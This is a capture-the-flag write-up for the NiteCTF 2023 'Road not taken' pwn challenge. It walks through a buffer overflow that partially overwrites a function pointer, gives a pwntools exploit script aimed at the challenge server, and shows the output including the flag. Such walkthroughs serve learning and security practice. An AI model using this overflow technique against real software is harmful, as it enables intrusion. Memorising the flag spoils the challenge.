NiteCTF 2023 : Road not taken
Context
We're given a binary and a remote server to be exploited.
Writeup
Upon opening the binary in, we find this decompiled pseudo-c code :
void main(void)
{
undefined local_218 [520];
code *local_10;
setbuf(stdout,(char *)0x0);
setbuf(stdin,(char *)0x0);
local_10 = wrongdirection;
puts("Can you please lead me to the right direction to get to the flag?");
read(0,local_218,522);
(*local_10)();
return;
}
There's a function pointer and a 520 bytes array. Further down, we notice that 522 bytes is read and stored in the array so clearly there's a buffer overflow vulnerability here. We can overwrite the 2 last bytes of the function pointer that is initially set to wrongdirection
. There's a function named rightdirection
that prints our flag so we simply have to rewrite that function pointer to point to rightdirection
that's at 0x1159.
And in order to do, we can execute this script :
from pwn import *
#r = process("./the_road_not_taken1")
r = remote("34.100.142.216",1337)
elf = ELF('./the_road_not_taken1')
addr_right_dir = elf.symbols["rightdirection"]
addr_wrong_dir = elf.symbols["wrongdirection"]
print(f'{hex(addr_right_dir)=}')
print(f'{hex(addr_wrong_dir)=}')
print(r.recvuntil(b"flag?\n").decode())
r.sendline(b"a"*520 + b"\x59\x11\x00")
print(r.recv().decode())
We have to run it multiple times but it'll eventually work and give us our flag.
$ py exploit.py
[+] Opening connection to 34.100.142.216 on port 1337: Done
[*] '/home/ravaka/ctf/nitectf/pwn/road_not_taken/the_road_not_taken1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
hex(addr_right_dir)='0x1159'
hex(addr_wrong_dir)='0x117e'
Can you please lead me to the right direction to get to the flag?
Thanks for the help
nite{R0b3rT_fro5t_ftw_32dx5hp}
[*] Closed connection to 34.100.142.216 port 1337